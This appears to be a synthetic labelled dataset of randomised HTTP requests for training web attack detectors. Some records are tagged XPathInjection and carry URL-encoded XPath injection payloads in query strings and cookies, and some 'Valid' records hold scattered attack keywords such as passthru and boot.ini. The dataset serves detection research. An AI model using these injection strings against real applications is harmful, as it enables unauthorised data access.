Client-ip: 26.94.80.41
Cookie: 1Bz7=:9at;MselectFsj4DYfzq=3464;iDhaiieS5irnsyn=th R5atzn;e4Ncu=687
Cookie2: $Version="81"
Date: Thu, 08 Sep 05 13:14:10 CET
ETag: "-.7kydcl6DWysFJLW"
Expect: 100-continue
From: wdp08E@ecUow0letw.uk
If-Modified-Since: Fri, 27 Jul 07 10:53:27 CET
If-Unmodified-Since: Sun, 21 Mar 04 18:08:39 CET
If-Match: "F4HinLwy0nlY2p8lN_m"
If-None-Match: *
If-Range: *
Max-Forwards: 4045
MIME-Version: 5.3
Pragma: F5i=rrn3en1x
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: Digest response="25f96a5A93c9FD43462C4CA3c6E4Feb9"
Range: -66
Referer: /1e0s/Syae/Ntyvyru/aNmetml.tar
TE: trailers,chunked
Trailer: Range
User-Agent: oNirrOce/6.3
UA-CPU: MIPS
UA-Disp: 0089,4532,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: rzoaf/3.5 www.xa4mO.tiff, 5.4 www.eoooN.html
Transfer-Encoding: deflate
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 210.113.185.220
X-Serial-Number: 179106
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xdtsldeHaidDy= 9far&OoyS89sepiE2tt=324&kda1u0ot=qot&ucrrlTarclUsbee=7158947&eLneoa=EoY9Aaeii&Nr3ac4j=5n?sTtecho&bnt=ede9sfse'veNpz&having1oeFqJM=%scriptmsgroup byua@ita

End - Id: 33487
Start - Id: 49445
class: XPathInjection
GET /ie10sgdc5rahobr/neslj6iae5a3ho/h3IaP9ibmvn-kr/w0tonqred3zmgeees/lq5/qolraeeEtzchubLgs/ihusicniore02jd/mC_X36S@/PM@6qchild7S/ddispmc6nqh9Odqaee/itynnA5ovpeS/tafun.jsp?UgstdtBalrghi=8BTA0b&aaihissm=t1i%2Ftnrh5n%2Fhtb%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D+or++%27neE1%27++++%3D%27&srojaoDo=en0%28Esmaf%2Bd&la9y3Te=siupsOacO HTTP/1.0
Host: 143.40.163.50:80
Connection: pWfam
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="10"
Date: Sat, 01 May 10 11:01:07 UTC
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Sat, 29 May 04 01:38:41 UTC
If-Unmodified-Since: Mon, 23 Jan 06 16:47:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 238
MIME-Version: 6.9
Pragma: m=gelnEeb
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: Basic ZWRsY3JsOm5ub2I=
Range: 80-08008,86-2,0-
Referer: http://edetham.fr/skawte/ten2heR/ietftTaa.sh
TE: trailers
Trailer: User-Agent
User-Agent: t1lYne (r@DsP@Ff)
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: FTP/3.2 www.2Opg.html:05816, cnt/4.7 123.191.221.150, FTP/8.1 www.lnwmusA.jpeg:38219
Transfer-Encoding: gzip
Upgrade: 4wre/8.6, sckoiq/7.6
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 210.37.128.90
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49445
Start - Id: 22995
class: Valid
GET /iignmctItng9eea/aiimt6foihTbiorcetsm/m.YVlh3-n@PYq.pu.jpg?westrntixephEog=uindar&nbiadoutftar=aEie&sned=ejt0a%3C%25inputeei&mhogos6ateZs=0335368229&lsddkuseu=aSPCPf&9mciyjNje=allne&laoOrelodsodt=Aaftp1eodetiyai+&aweHexelle4i=dn._Cc&9AqallZANme=thfpetn1&gtc=348201606&ZTxysystemQB5=7479126&sVDn=7b&naaHdentseshoer=mxml+h+&tnStaxlmjNhi=hno HTTP/1.1
Host: 130.174.120.32
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-korean;q=0.6, x-mac-japanese, iso-8859-15, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 84.81.179.39
Cookie: eolhBsgtau4ht=3sFe;mgO=a
Cookie2: $Version="6"
Date: Sat, 15 Apr 06 17:38:01 UTC
ETag: "WRSVHUeCwOB4cIbxa"
Expect: 0fssgi
From: pesd@at4tios7ee.ch
If-Modified-Since: Thu, 20 Jul 06 14:43:59 CET
If-Unmodified-Since: Tue, 14 Nov 06 07:38:41 CET
If-Match: *
If-None-Match: *
If-Range: "GvYt3vTdxj@CP_Ry"
Max-Forwards: 6
MIME-Version: 6.6
Pragma: re0Nc='i'
Proxy-Authorization: fmr5 Ld67ld=n9o0r
Authorization: Digest cnonce="oeucsyh0"
Range: 524874-69455
Referer: /eTesy.pdf
TE: trailers
Trailer: Pragma
User-Agent: 8pr63e4 (5Z2vIa-Zcx; kTo3KhgGh; s46zRdbEP)
UA-CPU: 68000
UA-Disp: 052,5191,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 465x0327
Via: 4.2 180.255.61.20
Transfer-Encoding: identity
Upgrade: nigeha/1.3, aooo3i/1.6, ognho/7.3, npd/3.1, pEnn5/3.0
Warning: 183 169.73.238.29 "ettes1Theraatk2r3Re" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 91483832
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22995
Start - Id: 50106
class: XPathInjection
POST /tqiXhV8I/rfX2pFWjx-Ksh.Q/rR_WdpMjZWBL1.jsp? HTTP/1.0
Content-Length: 44
Content-Language: linsdn
Content-Encoding: identity
Content-Location: /eiuemehn/rut4n/2ean/g6rlays3.js
Content-MD5: cXd3MGZjYWVkc2FpbnJkaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Dec 04 21:46:10 UTC
Last-Modified: Fri, 20 Oct 06 21:50:25 UTC
Host: www.kEtf.it
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: brauieni-9;q=0.3, Cscp-seor;q=0.0, sosqitut-gNb
Cache-Control: Lidehb5='bjetep8'
Client-ip: 192.64.250.181
Cookie: eicz=(i <     count(rr/child::text())   and     j <     count(zj63MI/child::comment())  and     k   <    count(yoc/child::*)  );imeos=<wb;4east8dzeoOtoeO=s3x0k4ZZ_
Cookie2: $Version="45"
Date: Sun, 02 Jan 05 24:06:38 GMT
ETag: W/"xxZkvUNV5QW_.u7aV"
Expect: 100-continue
If-Modified-Since: Tue, 03 Jul 07 19:00:15 GMT
If-Unmodified-Since: Wed, 08 Apr 09 05:16:27 GMT
If-None-Match: "bO6GMFzU7zvS9rdviN"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.3
Proxy-Authorization: dTgybu eztwn=NSi2fr
Authorization: Basic N2FpZWVhOmVyaXM2YQ==
Range: 0-,-01,-68
Referer: /emveaS/derpEun.mp3
TE: deflate
User-Agent: axHbOBqDd http://www.ellret5.org
Via: 4.1 32.129.124.219
Transfer-Encoding: n3ssh
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aehcnkhteeg=28549925&bdhe1oNwdhcnwa=80876421

End - Id: 50106
Start - Id: 25038
class: Valid
GET /7TEOMR3S_1.xsJA_s/jrlceEjrhAytdeo/nnz4rJXdTpo0gB_tpt/otsmsyruanc74hlrsn/kaiueiqdzpawoo5rp1o/egDHil57N/ke15il7ziTmy/lwhesdinznEpdNelevIe/smly7aoii.gif?zsnd0edcIssro=00445431&o2d=bStgeseuew0U%5Dm%40ylnck&thUe=3576956&les8u=toi&rmxMMg84wu=ut6acpa3cT&O-5ftpTBnNupdate7=5&8iIa2eautra8hrS=er0&1vth=Eea&mTyebafnFg4s=9209172&seae1=43102&kRDY-Cv.VJperl=71008&i7e0dnnxo=elcYnorrau5ez HTTP/1.1
Host: 201.176.123.163
Connection: keep-alive
Accept: image/*;q=0.3, image/*;q=0.4
Accept-Charset: x-mac-korean;q=0.7
Accept-Encoding: compress;q=0.4
Accept-Language: Rvsuua-zryp;q=0.8, Z3g-e9s;q=0.4
Cache-Control: u5fhu1H=f7eul
Client-ip: 116.181.120.142
Cookie: lCsraoo12asc=2
Cookie2: $Version="57"
Date: Fri, 03 Oct 08 01:52:39 CET
ETag: "qAU3Cm0C4P9m3izKaa"
Expect: eiirwb
From: ldep5e@hgrLTT7s.gov
If-Modified-Since: Tue, 28 Sep 04 05:41:01 UTC
If-Unmodified-Since: Wed, 04 May 05 21:12:47 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 8.5
Pragma: m='ckerg'
Proxy-Authorization: Basic bmFhbXIxZTpwdGVpcm5u
Authorization: enSafa rhda=nvmooea
Range: 81636-,-8
Referer: /iwcdnnne.doc
TE: chunked;q=0.0
Trailer: Referer
User-Agent: wmOcTiozmtanuruD
UA-CPU: x86
UA-Disp: 002,8745,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6866x078
Via: FTP/4.2 www.noetr.js, 7.6 178.201.230.171, 4.1 www.aoye.jpg:7905
Transfer-Encoding: eewa
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 976 50.238.126.25 "5Nrzea1Ynnb" "Thu, 31 Dec 09 03:17:04 GMT"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 25038
Start - Id: 7150
class: Valid
POST /iuiohl/46tF@iFgJC/iXpositionhttpsT6jTWDw9c/tejRqeceyyaf/ovd9ymuHFEGfY9wg83/ezrwJgqEl53YkZD9us.sh? HTTP/1.1
Content-Length: 111
Content-Language: uu,ty,ehwrbhRe
Content-Encoding: identity
Content-Location: /awOeet/eewtoi3/iemail/oveeeueu/onchaN.cgi
Content-MD5: ZGxsZWhlVGFxc2Fpa0ZlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Oct 09 06:15:20 CET
Last-Modified: Sat, 17 Jul 04 12:37:57 UTC
Host: 250.215.174.73:80
Connection: aern2ys
Accept: video/*;q=0.2, video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: fNcngEd-mge4;q=0.0
Cache-Control: no-store
Client-ip: 242.71.249.6
Cookie: nrfhdc=99960;bt=0ileeh4Sg3shd;qlok6=Moh;edosnepep1te=60328;lsa=I)rey0tm
Cookie2: $Version="8"
Date: Wed, 31 Jan 07 17:52:02 GMT
ETag: W/"RivLDL4hE_xM22g38l"
Expect: 100-continue
From: ohayn@eeaecasg.biz
If-Modified-Since: Sun, 03 Apr 05 13:55:01 CET
If-Unmodified-Since: Wed, 06 Jul 05 03:44:58 CET
If-Match: "P1e8IkyvNOjIKPYK"
If-None-Match: "ixPzPiLZghyQyp9TC@GV"
If-Range: "FgpUL_13bSQ0vq06"
Max-Forwards: 5228
MIME-Version: 0.5
Pragma: aeaUwaa=Leeet
Proxy-Authorization: Digest nc=063b82cf
Authorization: Digest qop=auth-int
Range: 8-880,5697-50697,95-
Referer: http://www.4fc96ea.com/wo9Ite.asmx
TE: deflate
Trailer: Pragma
User-Agent: 6_aghoO http://www.nntvlamm.cz
UA-CPU: MIPS
UA-Disp: 1964,0580,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 849x6253
Via: HTTP/1.1 154.33.77.189
Transfer-Encoding: compress
Upgrade: ecs3ms/8.7, i206fu/9.3, stsan/9.3
Warning: 252 131.157.16.66 "nmoie" 
X-Forwarded-For: 229.243.169.191
X-Serial-Number: 73109423646427331
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ueew=asHugh6Fant&sle=gfnhta&Qwa0=e4ZjslKrvBh&etftowna=5&dD=67014&oetewoch5enuh=frr loqoPelbae&ai36aish2b1tNLO=3

End - Id: 7150
Start - Id: 17156
class: Valid
GET /ljpw/atrciEunhattRgNma1.htm?ppgl8myiil=%2Fqt%276vmwp-lbins+w HTTP/1.1
Host: 83.87.251.168
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: el9chSm='e5'
Client-ip: 14.109.13.177
Cookie: yo1i= eswetlinkrEb;onsehfg=oY 'systemshyumtes;Av7eA7tlitls=w ginput
Cookie2: $Version="71"
Date: Sun, 15 Feb 04 09:01:05 CET
ETag: W/"fC2iwVqebiOk3RGH"
Expect: co46Lyu5
From: gcEsmc@smae.st
If-Modified-Since: Fri, 09 Jan 09 22:19:36 UTC
If-Unmodified-Since: Thu, 21 Apr 05 06:58:00 GMT
If-Match: "@lxq3@PuJVsFNiV5jp"
If-None-Match: "FBUwaohQJ1Ier._Ce"
If-Range: Wed, 28 Jul 04 02:32:00 GMT
Max-Forwards: 53
MIME-Version: 3.2
Pragma: d=irNtsea
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: Basic YWhoYnI6bnRpbnQ=
Range: 390931-971113
Referer: http://www.3dpw.st/otrwn.php
TE: gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 0.8; er-vh; rv:4.7.5) Gecko/28935973
UA-CPU: StrongARM
UA-Disp: 817,8711,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: epr/4.2 www.o7srensh.png, hdd/8.1 www.raef.js, ma0s/0.1 www.ercyoo.htm
Transfer-Encoding: compress
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 884 66.52.11.38 "buetRO9tneeajg1yc" 
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 92445
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17156
Start - Id: 24288
class: Valid
GET /cI6pkg9441wtzd8E8R/tsR10YqIhdxOLG/dmepebveifue4/hQibmgmHknaIF/92/d6goxssiaiaosit4Oidr/n1wpe/U3Vo.kG1wiR/zweahnrPorreNodoiu4/noHwHDBAJyn5Ee6pGDG/gqUlAo/apOQm.5-.JejgS3D.css? HTTP/1.0
Host: www.foelxsd.it
Connection: keep-alive
Accept: audio/x-wav;q=0.9, text/*;q=0.6, text/*;q=0.7
Accept-Charset: iso-8859-7
Accept-Encoding: deflate, identity;q=0.4, identity;q=0.8, deflate;q=0.0
Accept-Language: pesn-r6indbn;q=0.3
Cache-Control: only-if-cached
Client-ip: 145.172.207.179
Cookie: yfpe9bymh=o8st O~$E;eeVrmrHu=p5y-opo
Cookie2: $Version="45"
Date: Mon, 31 Jul 06 07:03:08 UTC
ETag: "KLlIolL8Io.c6m_"
Expect: 100-continue
From: somsctd@slielEozga.ch
If-Modified-Since: Wed, 28 Nov 07 18:02:35 CET
If-Unmodified-Since: Mon, 26 Apr 04 02:58:03 GMT
If-Match: "dQQva65h._-o_M0@N4FV"
If-None-Match: *
If-Range: "t1BFL3-HGgVeBjgbceq0"
Max-Forwards: 3
MIME-Version: 6.8
Pragma: astlot=if
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest opaque="A4eqhi"
Range: -1827
Referer: /tuttymtd/ho70s/t5u7fl.htm
TE: gzip,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 8.1; ct-5h; rv:5.8.8) Gecko/77791949
UA-CPU: 68000
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 982x566
Via: 5.3 185.189.1.183, 2.2 214.214.4.161
Transfer-Encoding: identity
Upgrade: 4teeg/2.2, le0/8.5, ifpl/3.1, 0slnt/3.9
Warning: 494 13.80.115.26:79 "esgjTrwOnjs" "Wed, 07 Oct 09 24:18:13 UTC"
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 21325127322802331
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24288
Start - Id: 2462
class: Valid
GET /eMdilweiaEd8ntghgc/scp9sx/eSeoGuzlOy@phjM8p.gif?3z8EizludEg4ee=ywgetcba8+Rofhs&d8h=1317&2l3hTUa=%3BlfkUsa HTTP/1.0
Host: 240.23.222.142
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.8, identity;q=0.9, deflate, identity;q=0.2, compress;q=0.5
Accept-Language: *;q=0.9
Cache-Control: max-age=75
Client-ip: 65.8.54.25
Cookie: 78tHa9toss=sZu4Wi3vhV.;awyh8geaRps4=avbscripti r
Cookie2: $Version="9"
Date: Sun, 18 Jun 06 20:47:44 GMT
ETag: W/"CuRD6g@yvVRM9TXyO"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Sat, 24 Dec 05 02:09:19 CET
If-Unmodified-Since: Sat, 14 Mar 09 05:53:01 GMT
If-Match: "@y__usaBYoN_4Cv"
If-None-Match: "E5BIrsmT8PXzzItjU1.Z"
If-Range: "Y_.WI7cFge-KKIX0"
Max-Forwards: 6
MIME-Version: 6.6
Pragma: C='eInUnacm'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: 3diNt oIinu=eeeh
Range: 87817-,2898-
Referer: http://www.Esna3eie.biz/viFks/st02c.jpg
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (X11; U; Solaris 1.6; ce-em; rv:3.2.6) Gecko/62441061
UA-CPU: x86
UA-Disp: 4040,6167,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 900x5240
Via: 7.8 119.145.224.200:87611, FTP/1.5 158.217.237.245
Transfer-Encoding: compress
Upgrade: vpeeo/7.4
Warning: 552 www.tsng.jpg:1 "tsmt879qcdlEstelgpx" "Wed, 23 Nov 05 20:06:09 UTC"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2462
Start - Id: 27412
class: Valid
GET /2J0eXrQYWEiuA/6ahbrgrIL8kO/aI/ssvaaide.jsp? HTTP/1.0
Host: 70.223.226.123:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 63.50.146.180
Cookie: eoes1zuN1mnr=tNal;ecOe8tzAwoa=fkGmQPTM53W2;usoroeNeragcb=er ;FPsystem3fsSallyHNf=kmooeyc;sUehDi3omia=En:ae>aidp=fa2dropftpgsfyboot.ini
Cookie2: $Version="704"
Date: Fri, 12 Mar 04 24:26:06 UTC
ETag: "90lNt1MOgJNu@cgl.25"
Expect: 100-continue
From: s3show@itrbi0a.de
If-Modified-Since: Thu, 15 Jan 04 01:41:59 UTC
If-Unmodified-Since: Thu, 31 Jan 08 03:04:46 CET
If-Match: "rwHKfXaN_FnHEjUAU2so"
If-None-Match: *
If-Range: Tue, 13 Apr 10 21:50:29 CET
Max-Forwards: 419
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM bmFvYWVpdW4wZHJsZG9FaXFoZWFybTRSbmFnc05lYzJwYW4=
Authorization: NTLM bEV0ZWVlYm9iZWNyNXRjWWhiWnlIdGZha21vc2lhdHVjd2s=
Range: 72281-,-99334,2815-
Referer: http://www.tyiAdesE.net/txtur7/etoaes1.jsp
TE: deflate;q=0.3,trailers
Trailer: Host
User-Agent: ttaz/1.9.3.7
UA-CPU: MIPS
UA-Disp: 7900,686,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 759x1141
Via: HTTP/7.1 134.164.218.32
Transfer-Encoding: mCici
Upgrade: anhok/6.7, tgihE/5.8
Warning: 042 127.96.173.181 "nHr5eer8soa9adtcmmH" 
X-Forwarded-For: 39.176.137.22
X-Serial-Number: 012150343166763006
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27412
Start - Id: 35677
class: XPathInjection
GET /access_logD7Rxrlsd4style.html?wndi7Vd=493&nhd5txeobe=%2Bme&AqPRU.Ge=ea%2FoE%2Feeeaeh%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D7%5D++%7C++++ph%2FEBS%2FuskeAm%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+or++%27e3oceo%27+%3D++%27&Hwhrpf=ochepatEol HTTP/1.0
Host: 217.182.13.41
Connection: close
Accept: image/*, audio/*;q=0.9, audio/x-wav;q=0.7
Accept-Charset: iso-8859-6;q=0.8, cp-932, x-mac-hebrew;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: fgE-boaomsyh;q=0.4, er-n, Ddbwn-xrH
Cache-Control: lhcte='mat95lr'
Client-ip: 68.97.141.43
Cookie: u0=qTaCXnQTE;-xii8FLl3form=i1el1a;xLihsplFE=89038694;uln=678111356;b1HtenKec=162293
Cookie2: $Version="063"
Date: Mon, 04 Sep 06 09:14:12 GMT
ETag: "7hIxyEEn8iRctKw2"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Wed, 05 Oct 05 16:51:04 UTC
If-Unmodified-Since: Sat, 21 Jun 08 13:22:43 UTC
If-Match: "6EcfwdMk1aunZoslE"
If-None-Match: *
If-Range: *
Max-Forwards: 780
MIME-Version: 5.4
Pragma: Ucruem='o'
Proxy-Authorization: NTLM cnFqYVJvMHJvbzRlY25hYW5hemk5ZGFyZXRpdGV0ZnN0QXhnNW9oZWh1ZWFuaHRl
Authorization: oErsen llotus=halypa
Range: -5103
Referer: http://ttogdyi.org/rasi.gif
TE: chunked,trailers,deflate;q=0.4
Trailer: From
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 2.8; ni-na; rv:2.8.3) Gecko/10952897
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: HTTP/1.0 www.u0ty8a.jpg:87944, 7.0 www.tehyt.css:66324, FTP/3.8 www.nedt7eeS.shtml
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35677
Start - Id: 48779
class: XPathInjection
GET /_ixgQ@/77eoenmr/tdKKGmCxPzYlzsNhfDd/4aoojoi/206o/io.pl?p8home2=r+rs&ZiBrzh6l39=28+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++768%3D&iydlsexavsde=08435760&hrsonlladlpn2T=48 HTTP/1.0
Host: www.ctgter5.cz:42
Connection: keep-alive
Accept: image/gif, application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 124.62.208.222
Cookie: c0dM8group bya1=7a;WDqZyQL=iO3;5Tooo=kfTTYUe2l3BU;triheRett=8344977
Cookie2: $Version="91"
Date: Wed, 11 Apr 07 24:15:29 GMT
ETag: W/"435RkSxWdhIQEwjN"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Sat, 23 Jul 05 12:12:21 UTC
If-Unmodified-Since: Sat, 01 May 10 03:09:12 CET
If-Match: "F.VxcKC-Wk0lF.m"
If-None-Match: *
If-Range: *
Max-Forwards: 4718
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: etllH 3Ru8ttge=taSgioeb
Range: 512488-28725,-179,34439-
Referer: http://www.iudbeY.st/tn7Sre/htdwm/nlntqsl.jsp
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: p4ahc2cmt (rvdM_J; p.FXNo6)
UA-CPU: Sparc
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: 5.0 www.osi2.css, HTTP/0.5 57.113.172.200, HTTP/6.5 223.116.34.88:4
Transfer-Encoding: deflate
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48779
Start - Id: 18324
class: Valid
GET /htarrw/aNirgca/idocwirza/h7hnns8rwin/irneyiew8tkaetswwna/77S/uyY@ucSuHFiuYNc/e1/DZ254_UGpJp.msf?togrk=raapsti8T&neeaegskegTdemT=43&wBKGKWhFQpassthruVs=ele%2F+hnEdt&naf=+p&naejdh=81&eTsenliogiet3=210&paesaets1oelto=tmwYeFxaudC&ckusfs0=diyelsjrsb&oao0u2Oskmehpzs=ncbc5%7Ex%5BsQ&leahllorbnaoetT=pE+8Osystemfme%40swh&ewsMc=ybtasscriptaR&X-betweenF5JA=ta&u0nta=clwinnt HTTP/1.0
Host: www.Dto7ea.ch
Connection: close
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 90.212.161.14
Cookie: xFNS=71290546;aieh4prkwizk=[6sT openiateeaoautoexec;hjf=gp=h;cod=el;sahhsmnuRt=jaseit
Cookie2: $Version="4"
Date: Tue, 13 Nov 07 18:14:26 GMT
ETag: "mRukCI5ousBrTlHc"
Expect: 4ral
From: dnouclte@Kesusuhhls.de
If-Modified-Since: Sun, 20 Nov 05 19:12:24 GMT
If-Unmodified-Since: Wed, 03 May 06 07:42:49 GMT
If-Match: *
If-None-Match: "HWaRmc_C1hZuiO4"
If-Range: Sat, 12 Jun 04 18:51:48 GMT
Max-Forwards: 7087
MIME-Version: 5.8
Pragma: utaooi='t46'
Proxy-Authorization: Basic dHZ0dGpSOm9vblJjclM=
Authorization: Digest algorithm=MD5-sess
Range: 33-392,-2077,7-8592
Referer: http://www.euhd.com/nihrdcn/dnto0es/eifo/uiBo.exe
TE: trailers,chunked;q=0.1,trailers
Trailer: Authorization
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 1.8; Zh-ri; rv:9.8.7) Gecko/23779419
UA-CPU: PowerPC
UA-Disp: 468,375,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: 8.7 www.arvsre.htm:49
Transfer-Encoding: identity
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9058000635056383380
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18324
Start - Id: 7462
class: Valid
PUT /lpcyu5sFxh/mfDb0q@WSl/1-_-qtiG7Zd66WH/2escaV/GpyvzetghTiftyen0eW/uk@Jt7U6/r-kDydVN9EIzCjv4RYlX/eAHfH4svtT47z@qAB3DL.jpeg? HTTP/1.0
Content-Length: 80
Content-Language: spit
Content-Encoding: deflate
Content-Location: /zrwh/hatotx/e1eotcas.asp
Content-MD5: cm5lYkdvcWxkc3NyNWVzeg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 10 23:03:04 CET
Last-Modified: Tue, 13 Dec 05 09:00:30 UTC
Host: 226.42.86.158
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n-efa;q=0.5, gea-c;q=0.3, spaa-N;q=0.1
Cache-Control: hyl4od0='oe'
Client-ip: 104.160.13.173
Cookie: ahs=seaotlib;uIltnTRnyre6e=uN6E-5JeXU
Cookie2: $Version="24"
Date: Thu, 09 Feb 06 08:51:37 CET
ETag: "WGe7-zYKUlhh0kn@YUc3"
Expect: rZidtmh
From: hqhle@cya0o.it
If-Modified-Since: Tue, 23 Dec 08 06:31:06 GMT
If-Unmodified-Since: Wed, 12 Oct 05 06:32:53 UTC
If-Match: "v1N_O.kUYo.FEcJ"
If-None-Match: *
If-Range: Sun, 03 Sep 06 14:08:16 UTC
Max-Forwards: 35
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM dDFyZGhPbGkzSG5udWFPdG9zdGk5b2VxZmhkckVvZW5lZGll
Authorization: Basic bmR5b29qMTpvdHN5YWw=
Range: -471
Referer: http://www.dnt4ufoe.gov/aoet1iNb/oni5E/ayfauRa/o9unoii/tJlH.shtml
TE: trailers,deflate;q=0.1,trailers
Trailer: Max-Forwards
User-Agent: lmdnIw/1.0.7
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 871x804
